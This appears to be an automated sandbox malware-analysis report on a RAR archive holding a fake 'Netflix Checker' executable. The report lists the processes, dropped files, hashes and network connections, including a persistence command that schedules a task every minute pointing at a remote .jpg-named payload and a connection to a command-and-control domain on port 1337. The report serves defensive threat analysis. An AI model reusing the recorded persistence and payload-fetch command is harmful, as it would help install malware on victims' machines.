File name: | Debug.rar |
Full analysis: | https://app.any.run/tasks/2277b4ae-2e11-46e0-a7d1-2a8ab074f984 |
Verdict: | Malicious activity |
Analysis date: | November 08, 2018, 18:08:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-rar |
File info: | RAR archive data, v5 |
MD5: | 843D394BBB98871DF06A02B4471092AC |
SHA1: | 6657EC18116179C938A2A1B42E2A8D3AB7EAE5FB |
SHA256: | 6A281F7F0EEB0B27157C80EA1E2E63E4A7E3C5E4F881F085BEBA031B0507E852 |
SSDEEP: | 24576:E7AldEFQOpJgPCvGOEya1ge9LXOmbmtxitu1nkEWJgm7pc:wYSF5pJp+TBge9zOug1nkEVm7pc |
.rar | | | RAR compressed archive (v5.0) (61.5) |
---|---|---|
.rar | | | RAR compressed archive (gen) (38.4) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2952 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Debug.rar" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
1876 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe6_ Global\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\System32\SearchProtocolHost.exe | — | SearchIndexer.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Exit code: 0 Version: 7.00.7600.16385 (win7_rtm.090713-1255) | ||||
1800 | "C:\Users\admin\Desktop\Netflix Checker By LEFTCRACKER V2.exe" | C:\Users\admin\Desktop\Netflix Checker By LEFTCRACKER V2.exe | explorer.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3904 | "C:\Users\admin\AppData\Roaming\Netflix Checker By LEFTCRACKER.exe" | C:\Users\admin\AppData\Roaming\Netflix Checker By LEFTCRACKER.exe | Netflix Checker By LEFTCRACKER V2.exe | |
User: admin Company: Microsoft Integrity Level: MEDIUM Description: ConsoleApp1 Exit code: 3762504530 Version: 1.0.0.0 | ||||
2776 | "C:\Users\admin\AppData\Roaming\svghost.exe" | C:\Users\admin\AppData\Roaming\svghost.exe | Netflix Checker By LEFTCRACKER V2.exe | |
User: admin Integrity Level: MEDIUM Description: WindowsFormsApplication2 Version: 1.0.0.0 | ||||
3276 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\admin\AppData\Local\Temp\idk4bjki.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | svghost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual Basic Command Line Compiler Exit code: 0 Version: 14.0.1055.0 | ||||
2152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES9570.tmp" "C:\Users\admin\AppData\Local\Temp\vbc5F4127DA4FD484AB88CA83D1DBE25AE.TMP" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | — | vbc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 12.00.52512.0 built by: VSWINSERVICING | ||||
672 | schtasks /create /sc minute /mo 1 /tn "svghost" /tr "https://c.top4top.net/p_1042v9c0c1.jpg" | C:\Windows\system32\schtasks.exe | — | svghost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2776 | svghost.exe | C:\Users\admin\AppData\Local\assembly\tmp\TIYJFU7S\p_1042v9c0c1.jpg | — | |
MD5:— | SHA256:— | |||
2776 | svghost.exe | C:\Users\admin\AppData\Local\assembly\tmp\TIYJFU7S\__AssemblyInfo__.ini | — | |
MD5:— | SHA256:— | |||
2776 | svghost.exe | C:\Users\admin\AppData\Local\assembly\dl3\RP969Y0D.XNM\OL0EOZ9J.KZV\c99d96e0\00dc69b8_6377d401 | — | |
MD5:— | SHA256:— | |||
3276 | vbc.exe | C:\Users\admin\AppData\Local\Temp\vbc5F4127DA4FD484AB88CA83D1DBE25AE.TMP | — | |
MD5:— | SHA256:— | |||
2152 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES9570.tmp | — | |
MD5:— | SHA256:— | |||
3276 | vbc.exe | C:\Users\admin\AppData\Local\Temp\vbc72DA7031C5814F6B8B3E1DF1BB9C5488.TMP | — | |
MD5:— | SHA256:— | |||
3276 | vbc.exe | C:\Users\admin\AppData\Local\Temp\idk4bjki.out | — | |
MD5:— | SHA256:— | |||
1800 | Netflix Checker By LEFTCRACKER V2.exe | C:\Users\admin\AppData\Roaming\svghost.exe | executable | |
MD5:1D861F62D377D8BD4B5329A5270C98B4 | SHA256:3D51B67AF228C17928049C9DA31E0F907FB38014E9A6D35FBF6DA0CA0CAEE698 | |||
2776 | svghost.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@top4top[1].txt | text | |
MD5:198E9C2A38A153A93412F0233EC825D5 | SHA256:98A5348F93EBF993050F5CE20907273588CFF7E4069276EB0FF2767874F1738B | |||
2776 | svghost.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\Client[1].jpg | executable | |
MD5:44F3A040393C88DCB5277EE7FCE82211 | SHA256:0D398359C66E65C7C23E23F98732593A6A7A1EB91947249B639F3443FD65B36E |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2776 | svghost.exe | 102.158.191.136:1337 | myrevenge.ddns.net | — | — | unknown |
2776 | svghost.exe | 163.172.209.116:443 | c.top4top.net | Online S.a.s. | NL | unknown |
Domain | IP | Reputation |
---|---|---|
c.top4top.net |
| suspicious |
myrevenge.ddns.net |
| malicious |
dns.msftncsi.com |
| shared |